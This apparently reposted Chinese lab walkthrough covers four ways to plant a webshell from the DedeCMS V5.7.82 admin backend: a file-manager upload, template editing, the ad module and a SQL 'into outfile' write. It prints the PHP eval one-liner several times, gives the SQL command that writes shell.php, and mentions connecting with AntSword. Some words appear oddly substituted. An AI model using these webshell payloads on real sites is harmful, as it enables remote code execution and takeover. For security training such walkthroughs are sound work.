DedeCMS-V5.7.82-UTF8织梦
先举行安装https://i-blog.csdnimg.cn/direct/918ea41f9f93414b94cf3ef8236c0b4f.png
https://i-blog.csdnimg.cn/direct/625e48b599984af1b1becc628db2f3d8.png
然后进入首页和管理员后台 内容要在后台举行操纵
首页
https://i-blog.csdnimg.cn/direct/ba0d83971a44429fbb9fd0322d9cda74.png
https://i-blog.csdnimg.cn/direct/2961efba8f1c4c09909da4fdb1a477de.png
后台
https://i-blog.csdnimg.cn/direct/b5f48ca7563d47d0a222bbb43c831e8d.png
1.通过文件管理器上传WebShell
访问目标靶场其思绪为 dedecms 后台可以直接上传任意文件,可以通过文件管理器上传php文件获取webshel
https://i-blog.csdnimg.cn/direct/726c05b501ca49b8ae611d069d61ef71.png
https://i-blog.csdnimg.cn/direct/ea51e4239d3a4e6f8918bacdb62d2126.png
登陆到后台点击【焦点】【文件式管理器】【文件上传】将准备好的一句话代
码上传
https://i-blog.csdnimg.cn/direct/de19fc22fe084ebb83c08315ce094a8f.png
https://i-blog.csdnimg.cn/direct/2608d9b3c87b4a68a20120831e971c4e.png
https://i-blog.csdnimg.cn/direct/3e959ae173c64a989adf555da1af02da.png
2.修改模板文件拿shell
点击模板 默认模板管理 index.html 然后点击修改
https://i-blog.csdnimg.cn/direct/c41c89e6d592479a89ef040d981bbe27.png
写入一句话木马<?php phpinfo();eval($_POST['cmd']);?>
https://i-blog.csdnimg.cn/direct/8808bfa6aea949c4be3bad7a2445c010.png
然后生存
接着点击生成 更新主页HTML--》将主页位置修改为【../index.php】--》点击 【生成静态】--》点击【更新主页】 再次访问站点首页可发现变化…
https://i-blog.csdnimg.cn/direct/9fbf8427e52541feba42d18a7d68ffe4.png
https://i-blog.csdnimg.cn/direct/6ea6684256334094934044c9b6ca9d38.png
3.后台任意下令执行拿WebShell
<?php phpinfo();eval($_POST['cmd']);?>
步骤一:点击 【模块】 --》 【广告管理】--》〔【增加一个新广告】--》在【广告内容】 处添
加一句话代码--》点击 【确定】
https://i-blog.csdnimg.cn/direct/92c534985b9247b19a8acb84d6ee4486.png
https://i-blog.csdnimg.cn/direct/7ea59c2b7cda4c108f30dd9baefe32a2.png
步骤二:点击【代码】--》在图中显示的路径与站点举行拼接..访问测试!
https://i-blog.csdnimg.cn/direct/faf5af536a7f4e858f104ed31edc8ccb.png
拿蚁剑测试连接
https://i-blog.csdnimg.cn/direct/5952167474ca4ca986f0a1d83ef2aeeb.png
4.SQL下令行
https://i-blog.csdnimg.cn/direct/0ae79a41ff404e73af7332cad9e14f99.png
输入一句话木马
select "<?php phpinfo();eval($_POST['cmd']);?>" into outfile "D:/phpstudy_pro/WWW/uploads/shell.php"
https://i-blog.csdnimg.cn/direct/7b09f69c134947f3b92fd5b84a9639df.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]